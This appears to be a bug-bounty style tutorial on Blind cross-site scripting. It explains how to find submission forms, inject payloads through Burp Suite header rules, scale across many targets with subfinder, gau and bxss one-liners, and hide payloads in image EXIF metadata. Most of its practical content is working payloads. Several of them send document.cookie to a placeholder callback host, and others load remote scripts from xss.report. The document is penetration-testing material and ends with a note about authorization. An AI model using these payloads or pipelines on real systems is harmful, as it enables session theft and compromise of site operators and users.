Loading...
Advanced techniques for stealthy cross-site scripting attacks
Blind XSS (BXSS) is a stealthy form of cross-site scripting where payloads are stored in places you can't see immediately, such as logs, admin panels, email templates, file metadata and other backend systems, and only execute later when those systems render the data. Because there's no instant feedback, it requires specialized tools and techniques.
Before hunting for Blind XSS, you need the right toolset configured and ready.
The first step in any hunt is finding the right targets. Use custom dorks to locate various submission forms across the web that may be vulnerable to Blind XSS.
Before injecting payloads, you need a system to generate them and listen for their callbacks. This involves a Blind XSS server and a payload manager.
Use Burp Suite's Match and Replace feature to automatically inject Blind XSS payloads into every request you make.
Navigate to Proxy > Settings > Match and ReplaceClick 'Add' to create a new ruleSet rule to replace User-Agent with your payloadThese are example HTTP request headers with Blind XSS payloads. Replace YOUR-COLLAB.DOMAIN with your actual callback server.
User-Agent: <script src="https://YOUR-COLLAB.DOMAIN"></script>Referer: https://YOUR-COLLAB.DOMAIN/?r=refX-Forwarded-For: 127.0.0.1, https://YOUR-COLLAB.DOMAIN/X-Api-Version: <svg onload="new Image().src='https://YOUR-COLLAB.DOMAIN/?c='+document.cookie"></svg>Cookie: session=abc; extra=<img src=x onerror="new Image().src='https://YOUR-COLLAB.DOMAIN/?c='+document.cookie">For manual testing, use a User-Agent switcher browser extension to quickly inject payloads while browsing.
Use one-liner tools and scripts to scale your Blind XSS testing across many targets automatically.
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"subfinder -d vulnweb.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://xss.report/c/coffinxp></script>' -parameterssubfinder -d vulnweb.com | gau | bxss -payload '"><script src=https://xss.report/c/coffinxp></script>' -header "X-Forwarded-For"A clever technique is embedding XSS payloads in image metadata. When the application displays the metadata, your payload executes.
exiftool -Comment='"><img src=x onerror=alert(1)>' test.jpgexiftool -Title='"><script src=https://YOUR-COLLAB.DOMAIN></script>' test.jpgexiftool -Subject='"><svg onload=alert(1)>' test.jpgFor highly-secured targets with strong input filtering, use encoded payloads. Create a single HTML file with dozens of payloads, each encoded differently (double URL encoding, triple URL encoding, HTML entities, etc.).
"><script src=https://YOUR-COLLAB.DOMAIN></script>'"><img src=x onerror=this.src='https://YOUR-COLLAB.DOMAIN/?c='+document.cookie><svg/onload="fetch('https://YOUR-COLLAB.DOMAIN/?c='+document.cookie)">javascript:eval(atob('BASE64_ENCODED_PAYLOAD'))%22%3E%3Cscript%20src%3Dhttps%3A%2F%2FYOUR-COLLAB.DOMAIN%3E%3C%2Fscript%3E%25%32%32%25%33%45%25%33%43%73%63%72%69%70%74...Blind XSS isn't for the impatient, but it's one of the most rewarding vulnerabilities. Be everywhere: automate payloads in headers with Burp or a User-Agent switcher, scale with one-liners that crawl targets, and never underestimate hidden payloads in image EXIF data. Every technique here is a tool to ensure no input goes untested. Build a robust methodology, think creatively, and let the backend do the work for you.
For educational and authorized testing purposes only. Always obtain proper authorization before testing.